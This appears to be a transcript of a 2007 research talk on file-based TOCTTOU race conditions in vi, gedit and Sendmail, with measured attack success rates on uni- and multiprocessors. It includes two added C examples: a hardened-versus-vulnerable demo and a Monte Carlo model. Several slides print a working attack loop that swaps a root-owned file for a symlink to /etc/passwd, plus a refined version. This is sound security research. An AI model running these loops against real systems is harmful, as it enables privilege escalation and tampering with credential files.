multiprocessors may reduce system dependability under file-based race condition attacks


Page 1: Multiprocessors May Reduce System Dependability Under File-based Race Condition Attacks

Jinpeng Wei, Calton Pu
Georgia Institute of Technology, Atlanta, Georgia, USA

Presented at DSN-DCCS, June 28, 2007

Page 2: System Dependability: Brief History

- Traditionally focused on availability and reliability (have redundancy, keep running)
- Now security and safety are urgent issues
- Widely deployed software systems have bugs
- Software systems are under constant attack: intended behavior != actual behavior

Page 3: Multiprocessors: Boon or Bane?

- Definitely they are good:
  - Better performance
  - Lower power consumption
  - More secure: intrusion detection systems
- Unless they fall into bad hands... An attacker can become faster in a race condition attack, thus making the system less secure.

Page 4: It's Much Easier to Attack TOCTTOU Vulnerabilities on Multiprocessors

[Bar chart: attack success rate (%) for vi and gedit, uniprocessor vs. multiprocessor]

Page 5: Agenda

- Background about TOCTTOU and the vulnerabilities in vi and gedit
- A probabilistic model for TOCTTOU attacks
- Probability analysis of exploiting vi
- Probability and event analysis of exploiting gedit
- Parallelizing the attack program on a multiprocessor
- Conclusion

Page 6: Definition and Scope

- TOCTTOU – Time Of Check To Time Of Use, a kind of file-based race condition in Unix-style systems
- Check – establish some precondition (invariant) about a file
- Use – operate on the file assuming that the invariant is still valid

Page 7: Sendmail Example

Sendmail runs as root and operates on files owned by normal users.

Check: is /home/abc/mailbox a symbolic link?
  Yes -> error handling
  No  -> proceed to Use
This establishes the invariant: /home/abc/mailbox is NOT a symbolic link.

Use: append the new message to /home/abc/mailbox, assuming the invariant still holds.

Page 8: Sendmail Vulnerability: An Example

Timeline (Sendmail running as root, attacker running as user abc):

  Sendmail (root):  Check - /home/abc/mailbox a symbolic link? No
  Attacker (abc):   Delete /home/abc/mailbox
  Attacker (abc):   Create symbolic link mailbox, pointing to /etc/passwd
  Sendmail (root):  Use - append the new message to /home/abc/mailbox (actually to /etc/passwd)

Effect: the attacker may get unauthorized root access!

Page 9: TOCTTOU Vulnerabilities in Red Hat Linux 9 [1]

  Application   TOCTTOU pair      Possible exploit
  vi            <open, chown>     Changing the owner of /etc/passwd to an ordinary user
  gedit         <rename, chown>   Changing the owner of /etc/passwd to an ordinary user
  rpm           <open, open>      Running arbitrary command
  emacs         <open, chmod>     Making /etc/shadow readable by an ordinary user

Tested: ~130 utilities from /bin, /sbin and /usr/bin

[1] Jinpeng Wei, Calton Pu. TOCTTOU Vulnerabilities in UNIX-Style File Systems: An Anatomical Study. FAST '05.

Page 10: vi 6.1 Vulnerability

The vulnerability happens when:
- vi is run by root
- vi is editing a file owned by a normal user (who is also the attacker)
- vi saves the file being edited

TOCTTOU pair: <open, chown>
- open creates a new file for writing
- chown changes the owner of the new file to the normal user

  while ((fd = mch_open((char *)wfname, …)
  …
  chown((char *)wfname, st_old.st_uid, st_old.st_gid);

Page 11: gedit 2.8.3 Vulnerability

Similar to the vi vulnerability:
- gedit is run by root
- gedit is editing a file owned by a normal user (who is also the attacker)
- gedit saves the file being edited

TOCTTOU pair: <rename, chown>
- rename creates a new file (the temporary file is renamed over the real one)
- chown changes the owner of the new file to the normal user

  /* create and write to temp_filename … */
  if (rename (temp_filename, real_filename) != 0) { … }
  chmod (real_filename, st.st_mode);
  chown (real_filename, st.st_uid, st.st_gid);
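The check-then-use pairs from Pages 7, 8, 10 and 11 beside descriptor-based forms that close the window, as an added example (this code is not from the slides or from Sendmail, vi or gedit). It runs unprivileged in a temporary directory; the file passwd_standin, the mailbox and note names and their contents are constructed for the demo, and the attacker's unlink/symlink swap from the slides is invoked from the victim's own thread at the point where a real attacker would have to win the race, so the outcome is deterministic:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The attacker's move from the slides' attack program (unlink + symlink). The demo calls
 * it from the victim's own thread at the point where a real attacker would have to win
 * the race, so the outcome is deterministic. */
static int swap_for_symlink(const char *path, const char *target)
{
    return (unlink(path) == 0 && symlink(target, path) == 0) ? 0 : -1;
}

/* Sendmail-style append. Vulnerable form as on the slides: lstat() check, then open() by
 * path, with the swap in between. Hardened form: no separate check; open(O_NOFOLLOW)
 * fails with ELOOP on a symlink and fstat() inspects the object actually opened. */
static int append_file(const char *path, const char *msg, const char *attacker, int hardened)
{
    struct stat sb;
    int fd;
    if (!hardened) {
        if (lstat(path, &sb) != 0 || S_ISLNK(sb.st_mode)) return -1;      /* Check, by name */
        if (attacker && swap_for_symlink(path, attacker) != 0) return -1; /* the window */
        fd = open(path, O_WRONLY | O_APPEND);                             /* Use: follows the link */
    } else {
        if (attacker && swap_for_symlink(path, attacker) != 0) return -1; /* attacker goes first */
        fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
        if (fd >= 0 && (fstat(fd, &sb) != 0 || !S_ISREG(sb.st_mode) || sb.st_nlink != 1)) {
            close(fd); errno = EINVAL; return -1;                         /* not a plain file */
        }
    }
    if (fd < 0) return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* vi/emacs-style save: create and write the file, then fix its mode. chown() has the same
 * shape; chmod() is used so the demo needs no root. Vulnerable form: chmod(path), which
 * re-resolves the name and lands on the link target. Hardened form: open(O_NOFOLLOW) and
 * fchmod(fd), which acts on the inode behind the descriptor whatever the name is now. */
static int save_file(const char *path, const char *data, mode_t mode, const char *attacker, int hardened)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | (hardened ? O_NOFOLLOW : 0), 0600);
    if (fd < 0) return -1;
    if (write(fd, data, strlen(data)) < 0 ||
        (attacker && swap_for_symlink(path, attacker) != 0)) { close(fd); return -1; }
    int rc = hardened ? fchmod(fd, mode) : chmod(path, mode);            /* Use */
    close(fd);
    return rc;
}

static struct stat st_of(const char *path)
{
    struct stat sb = {0};
    stat(path, &sb);
    return sb;
}

/* Plays the four scenarios in a fresh temp directory, where "passwd_standin" stands in
 * for /etc/passwd. Returns a bitmask: bit 0 = the vulnerable append grew the stand-in,
 * bit 1 = the hardened append refused the symlink, bit 2 = chmod(path) after the swap
 * changed the stand-in's mode, bit 3 = fchmod(fd) left it alone. 15 means both attacks
 * hit the vulnerable forms and neither touched the hardened ones. */
int run_demo(void)
{
    char dir[64] = "/tmp/toctou_demo_XXXXXX";
    if (!mkdtemp(dir)) { strcpy(dir, "./toctou_demo_XXXXXX"); if (!mkdtemp(dir)) return -1; }
    char standin[128], mbox[128], note[128];
    snprintf(standin, sizeof standin, "%s/passwd_standin", dir);
    snprintf(mbox, sizeof mbox, "%s/mailbox", dir);
    snprintf(note, sizeof note, "%s/note.txt", dir);
    const char *seed = "root:x:0:0:root:/root:/bin/sh\n";                /* constructed contents */
    int result = 0, fd;

    if ((fd = open(standin, O_WRONLY | O_CREAT | O_TRUNC, 0600)) < 0) return -1;
    if (write(fd, seed, strlen(seed)) < 0) return -1;
    close(fd);

    /* 1: mailbox is a regular file at check time and a symlink at use time */
    close(open(mbox, O_WRONLY | O_CREAT, 0600));
    if (append_file(mbox, "evil::0:0::/:/bin/sh\n", standin, 0) == 0 &&
        st_of(standin).st_size > (off_t)strlen(seed)) result |= 1;

    /* 2: same swap, but open(O_NOFOLLOW) refuses the link outright */
    unlink(mbox);
    close(open(mbox, O_WRONLY | O_CREAT, 0600));
    if (append_file(mbox, "more\n", standin, 1) == -1 && errno == ELOOP) result |= 2;

    /* 3: chmod(path) after the swap lands on the stand-in (compare emacs <open, chmod>) */
    if (save_file(note, "text\n", 0644, standin, 0) == 0 &&
        (st_of(standin).st_mode & 0777) == 0644) result |= 4;

    /* 4: fchmod(fd) after the same swap does not */
    chmod(standin, 0600);
    unlink(note);
    if (save_file(note, "text\n", 0644, standin, 1) == 0 &&
        (st_of(standin).st_mode & 0777) == 0600) result |= 8;

    unlink(note); unlink(mbox); unlink(standin); rmdir(dir);
    return result;
}

int main(void) { int r = run_demo(); printf("run_demo() = %d\n", r); return r == 15 ? 0 : 1; }
```

Both hardened forms rest on one idea: resolve the name once, then do every check and every privileged operation on the file descriptor (fstat, fchmod, fchown), never on the path again. The st_nlink == 1 test additionally guards a spool file against a hard link to another file, which the symlink checks alone do not catch.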

Page 12: An Attack Program

   1  while (!finish) {
   2    if (stat(filename, &stbuf) == 0) {
   3      if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))
   4      {
   5        unlink(filename);
   6        symlink("/etc/passwd", filename);
   7        finish = 1;
   8      }
   9    }
  10  }

Observation: the file owner temporarily becomes root during the vulnerability window.

Simple, brute-force.

Page 13: Event Analysis of vi Exploit on a Uniprocessor

Page 14: Agenda (repeated from Page 5)

Page 15: Some Definitions for the Probabilistic Model

- Window of vulnerability: the time interval between check and use (e.g., <open, chown>).
- Attack pattern: {detection}+ [attack]
  - detection can be run 1 or more times
  - attack can be run 0 or 1 time
- Three process states:
  - Suspended: unable to run (relinquishing the CPU)
  - Scheduled: able to run (using the CPU)
  - Finished: finished the attack actions (symbolic link replacement, etc.)

Page 16: A Probabilistic Model for Predicting TOCTTOU Attack Success Rate

  P(attack succeeds) =
      P(victim suspended)     * P(attack scheduled | victim suspended)     * P(attack finished | victim suspended)
    + P(victim not suspended) * P(attack scheduled | victim not suspended) * P(attack finished | victim not suspended)

- P(attack succeeds) on a multiprocessor is not less than on a uniprocessor, because of the second term: P(attack scheduled | victim not suspended) = 0 on a uniprocessor, but not on a multiprocessor, where the attacker can run on another CPU while the victim runs.
- The success gain from the second term may become significant when P(victim suspended) is very small.
- But wait: can the attack be finished in time?

Page 17: P(attack finished | victim not suspended)

- D = detection time
- L = t2 - t1 (laxity)
  - t1 = the earliest start time for a successful detection
  - t2 = the latest start time for a successful detection leading to a successful attack

The answer =
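An added Monte Carlo sketch of the model equation on Page 16 and the D/L definitions on Page 17 (example code, not the paper's simulator, and its numbers are not the paper's measurements). The scheduling rules and the microsecond values it assumes are this example's own and are labelled in the comments; what it shows is the uniprocessor term vanishing when the victim never blocks, the SMP rate being driven only by the laxity L against D, and the SMP rate never falling below the uniprocessor rate for the same scenario:

```c
#include <stdint.h>
#include <stdio.h>

/* Scenario parameters: times in microseconds, the rest probabilities. */
typedef struct {
    double W;      /* window of vulnerability: from check (open) to use (chown) */
    double D;      /* detection time: one stat() + compare iteration of the attacker */
    double A;      /* attack time: unlink() + symlink() */
    double p_susp; /* P(victim suspended): chance the victim blocks inside the window */
    double S;      /* length of that suspension; it also delays the use by S */
    double q;      /* P(attack scheduled | victim suspended): the attacker, not some
                      other runnable process, gets the CPU the victim gave up */
} scenario;

/* Small xorshift PRNG so every run is reproducible. */
static uint64_t rng_state;
static double urand(void)
{
    rng_state ^= rng_state << 13; rng_state ^= rng_state >> 7; rng_state ^= rng_state << 17;
    return (double)(rng_state >> 11) / 9007199254740992.0;   /* [0, 1) */
}

/* One victim save. Returns 1 if the attacker's symlink is in place before the use.
 * Modelling assumptions (this example's, not measured): detections run back to back
 * with a random phase relative to the victim and observe ownership at their start;
 * a suspension, when it happens, hands the CPU to the attacker for S microseconds
 * and delays the use by the same amount. */
static int trial(const scenario *sc, int smp)
{
    double phase = urand() * sc->D;                 /* start of the attacker's next detection */
    int suspended = urand() < sc->p_susp;
    double t_use = sc->W + (suspended ? sc->S : 0.0);

    if (smp) {
        /* The attacker has its own CPU, so only timing matters: the earliest useful
         * detection start is t1 = 0 (file just became root-owned), the latest is
         * t2 = t_use - D - A, and the laxity is L = t2 - t1. */
        double t1 = 0.0, t2 = t_use - sc->D - sc->A;
        if (t2 < t1) return 0;                      /* negative laxity: hopeless */
        double t = phase;
        while (t < t1) t += sc->D;                  /* first detection start inside the window */
        return t <= t2;
    }
    /* Uniprocessor: P(attack scheduled | victim not suspended) = 0, and even when the
     * victim blocks the attacker must win the CPU (q) and then fit the rest of its
     * current iteration, one fresh detection and the attack into S. */
    if (!suspended || urand() >= sc->q) return 0;
    double residual = urand() * sc->D;
    return residual + sc->D + sc->A <= sc->S;
}

/* Monte Carlo estimate of P(attack succeeds) for one machine type. */
double success_rate(const scenario *sc, int smp, int trials)
{
    rng_state = 0x9E3779B97F4A7C15ULL;             /* same stream for every call */
    int wins = 0;
    for (int i = 0; i < trials; i++) wins += trial(sc, smp);
    return (double)wins / trials;
}

/* Convenience wrapper with fixed attacker timings (illustrative values, not measured). */
double rate(double window_us, double p_susp, int smp)
{
    scenario sc = { .W = window_us, .D = 20, .A = 30, .p_susp = p_susp, .S = 150, .q = 0.5 };
    return success_rate(&sc, smp, 100000);
}

int main(void)
{
    struct { const char *name; double W, p; } cases[] = {
        { "large file, victim sometimes blocks", 400, 0.3 },
        { "tiny file, victim sometimes blocks",   45, 0.3 },
        { "large file, victim never blocks",     400, 0.0 },
    };
    for (int i = 0; i < 3; i++)
        printf("%-36s uniprocessor %.3f   SMP %.3f\n", cases[i].name,
               rate(cases[i].W, cases[i].p, 0), rate(cases[i].W, cases[i].p, 1));
    return 0;
}
```

With these inputs the "victim never blocks" case gives exactly 0 on the uniprocessor and 1 on the SMP, which is the second term of the Page 16 equation doing all the work; shrinking W (a smaller file) drives the SMP case toward the negative-laxity branch, which is the L versus D effect discussed on the following pages.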

Page 18: Agenda (repeated from Page 5)

Page 19: Success Rate of Attacking vi on a Uniprocessor

- Between 1.5% and 18%
- Approaches 0 when the file size approaches 0 (the window of vulnerability is the write between open and chown, so it shrinks with the file)

  while ((fd = mch_open((char *)wfname, …)
  /* writing to wfname using fd … */
  chown((char *)wfname, st_old.st_uid, st_old.st_gid);

Page 20: Success Rate of Attacking vi on an SMP

- 100% for files with size >= 20KB (L >> D)
- 96% for files with 1 byte (L and D become close; the attack may not be scheduled in time)

Page 21: Agenda (repeated from Page 5)

Page 22: gedit Attack Success Rates

- 0 on a uniprocessor
- 83% on an SMP (2 x 1.7 GHz CPUs, 512 MB memory)
- The delay between rename and chmod is an important contributing factor to L. It is 43 microseconds on the SMP.

Table: L and D values in microseconds (SMP)

  if (rename (temp_filename, real_filename) != 0) { … }
  chmod (real_filename, st.st_mode);
  chown (real_filename, st.st_uid, st.st_gid);

Page 23: gedit Attack on a Multicore

- 2 x 3.2 GHz dual-core CPUs with HT, 4 GB memory
- No success at all! Why?

Page 24: New Observation on the gedit Attack

- A CPU is a necessary but not sufficient condition for a successful attack.
- The semaphore on the shared file is another necessary condition: the race between gedit and the attacker for the semaphore decides the attack result.
- The delay between stat and unlink in the attacker is 17 us.
- The delay between rename and chmod is now only 3 us.
- There is a 6 us trap (due to a page fault) within the 17 us of the attacker.

Page 25: Rethinking the gedit Attack Program

- There is a trap when the true branch of statement 3 is taken, because unlink has never been invoked before by the attacker.
- The Linux kernel maps shared libraries (e.g., libc) into an application's address space dynamically, so the first call into a not-yet-touched part of libc takes a page fault.

   1  while (!finish) {
   2    if (stat(filename, &stbuf) == 0) {
   3      if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))
   4      {
   5        unlink(filename);
   6        symlink("/etc/passwd", filename);
   7        finish = 1;
   8      }
   9    }
  10  }

Page 26: The Solution…

Proactively invoke unlink to remove the trap: every iteration performs the unlink/symlink pair, on a dummy name when the check fails, so the libc code is already mapped when the real target appears.

   1  while (!finish) {            /* argv[1] holds filename */
   2    if (stat(argv[1], &stbuf) == 0) {
   3      if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))
   4      {
   5        fname = argv[1];
   6        finish = 1;
   7      }
   8      else
   9        fname = dummy;
  10
  11      unlink(fname);
  12      symlink("/etc/passwd", fname);
  13    } // if stat(argv[1] ..
  14  } // while

Page 27: New gedit Attack on a Multicore

- Started to see successes.
- The trap disappeared.

Page 28: Agenda (repeated from Page 5)

Page 29: Pipelining the Attack Program

- symlink need not wait for the completion of unlink, so we can make the attack program multi-threaded.
- The attack can finish much earlier when the shared file is large, giving an advantage when the vulnerability window is very small.

Page 30: Conclusion

- A probabilistic model for TOCTTOU attacks which captures the reduced system dependability caused by the deployment of multiprocessors.
- Probability measurement and event analysis of exploiting vi and gedit, which corroborate the model and demonstrate how the attacker may utilize multiprocessors to achieve a higher success rate.